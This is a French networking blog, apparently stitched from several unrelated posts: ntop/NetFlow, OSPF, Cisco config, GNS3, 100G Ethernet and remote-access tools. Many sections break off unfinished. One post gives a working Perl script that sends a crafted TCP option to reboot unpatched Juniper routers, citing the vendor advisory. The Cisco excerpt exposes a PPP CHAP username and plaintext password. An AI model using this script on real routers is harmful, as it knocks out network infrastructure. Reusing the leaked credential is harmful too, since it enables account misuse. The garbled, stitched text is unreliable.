ntop est un outil super pour superviser ce qui se passe un peu sur son réseau. C’est un outil qui possède la capacité depuis longtemps de gérer NetFlow.
Soit la topologie :

Ensuite :

root@aragorn# apt-get install ntop
[...]
root@aragorn#

Ca roule, vous devez pouvoir déjà récupérer sur votre station/serveur de supervision sur le port 3000 pleins d’informations :)

Attaquons-nous maintenant à la partie NetFlow:
Pour que cela fonctionne il vous faut :

OSPF et un peu plus …

Ce document va plus entrer en détails sur les parties relatives aux aires OSPF et donc les types de LSA envoyés dans ses aires.

1. Rappel sur OSPF

OSPF (Open Short Path First) est un standard ouvert. OSPF est un protocole de routage interne. Il est basé sur les RFC 2328 et 2740. OSPF est un protocole à état de liens, contrairement à RIP et EIGRP qui sont des protocoles dits à vecteur de distance. OSPF se base sur l’algorithme de Dijkstra afin d’éviter les boucles dans le réseau.
Il utilise le protocole IP et au niveau transport le protocole 89 (son propre protocole).
Un protocole à état de liens maintient une topologie complète du réseaux: L’état de tous les liens.
On peut voir la topologie du réseau comme une carte routière. Dans un réseau OSPF, chaque routeur dispose de la même carte pour se repérer dans le réseau. Néanmoins, chaque routeur doit fournir des informations sur l’états des liens qui lui sont directement connectés et autres suivant le type du routeur.

Je vous recommande la lecture de cette RFC (5569): Elle décrit la technologie 64rd utilisée par Free pour déployer ou bien fournir pour être plus précis de l’IPv6 à ses clients.

Au passage, je vous recommande aussi la lecture assidue du blog de Stéphane Bortzmeyer…

• Partie signficative de la configuration du routeur Cisco (C851-K9 juste pour information, cela n’a aucune importance dans la résolution du problème):

  CI-174-plop#sh run int vlan 1
  Building configuration...
  
  Current configuration : 169 bytes
  !
  interface Vlan1
   description **** LAN ****
   ip address 1.1.1.1 255.255.255.248
   no ip redirects
   no ip proxy-arp
   ip tcp adjust-mss 1420
   load-interval 30
  end
  
  CI-174-plop#sh run int dial 1
  Building configuration...
  
  Current configuration : 257 bytes
  !
  interface Dialer1
   mtu 1460
   ip address negotiated
   no ip redirects
   encapsulation ppp
   ip tcp adjust-mss 1420
   dialer pool 1
   dialer-group 1
   ppp authentication chap pap callin
   ppp chap hostname B8756-04515-781@fournisseur.wireless
   ppp chap password 0 032004439900435DFDF
  

  • 1.1.1.1/30 est un subnet d’adresses IP publiques (récemment alloué /8)
  • La session PPP s’établit correctement et aucun problème de transit n’est établit.La configuration du routeur Cisco ne peut être changée.

• nas-plop est un routeur Linux de configuration :

L’envoi d’un paquet TCP avec des options particulières ferait rebooter les routeurs Juniper dont le firmware ne serait pas à jour (< 28/01/2009).

$ cat junos-crash.pl
#!/usr/bin/perl

my $host =      shift;
my $port =      shift;

use             Net::Packet qw($Env);

use             Net::Packet::IPv4;
my $ip =        Net::Packet::IPv4->new(dst => $host);

use             Net::Packet::TCP;

my $tcp =       Net::Packet::TCP->new(
                    dst         => $port,
                    options     =>  "x65x02x01x01",
                );

use             Net::Packet::Frame;
my $frame =     Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);

$frame->send;
exit 0;

Cet incident est reporté et connu de Juniper sous : juniper-PSN-2010-01-623.txt.
A vos mises à jour :)

Je suis impatient de voir ce que va nous réserver la future Freebox v6 :)

Grâce à tweet de @rickmur, j’ai découvert que la future version 0.7 de GNS3 permettra de faire tourner des JunOS :-) !!

   =>http://www.gns3.net/content/gns3-07rc1

Faire tourner JunOS sur un PC via Qemu : http://blog.gns3.net/2009/10/olive-juniper/.

Bref, faites chauffer les neurones pour de zolis labs en mixant IOS et JunOS :)

Juniper a fait un test entre Seattle et Portland d’une transmission 100Gbits Ethernet sur le réseau de Level3 et Internet2 avec sa plateforme T1600. Vive le 100Gbits Ethernet (802.3ba) !!!

A l’heure, où les FAIs font offrir à leurs abonnés du FTTH et du très haut débit, il faudra que les backbones des opérateurs soient en mesure de transmettre tous ces flux agrégés. Pour rappel sur un NRA 5000 prises, soient 5000 abonnés à 100 Mbits => 500Gbits. Alors, je sais que les backbones ne sont pas tous conçus pour supporter la charge complète, mais bon … Je me demandais comment cela allait être possible, voilà chose faite. La carte 100G chez Juniper du doux nom : PD-1x100GE-CFP

	Pour les windoziens et accro aux telnet/ssh, voici un petit outil qui je pense va vous faciliter la vie :-) => http://www.mremote.org
Il supporte les protocoles : - RDP (Remote Desktop) - VNC (Virtual Network Computing) - ICA (Independent Computing Architecture) - SSH (Secure Shell) - Telnet (TELecommunication NETwork) - HTTP/S (Hypertext Transfer Protocol) - Rlogin (Rlogin) - RAW
Il permet la sauvegarde de sessions et du multi-onglets :-) Sur ce, moi je reste avec mes xterm, mais je pense que cet outil est bien sympathique tout de même. PS: Merci à @MCL_Nicolas pour son tweet ;)

Pour ceux qui n’ont pas l’argent de se payer un lab pour passer leur certification Cisco,
la communauté ‘packetlife.net’ a mis en place un lab, accessible en remote.
Il faut bien entendu réserver un créneau et tout et tout …

Plus d’informations à la page : http://packetlife.net/wiki/packet-life-community-lab/.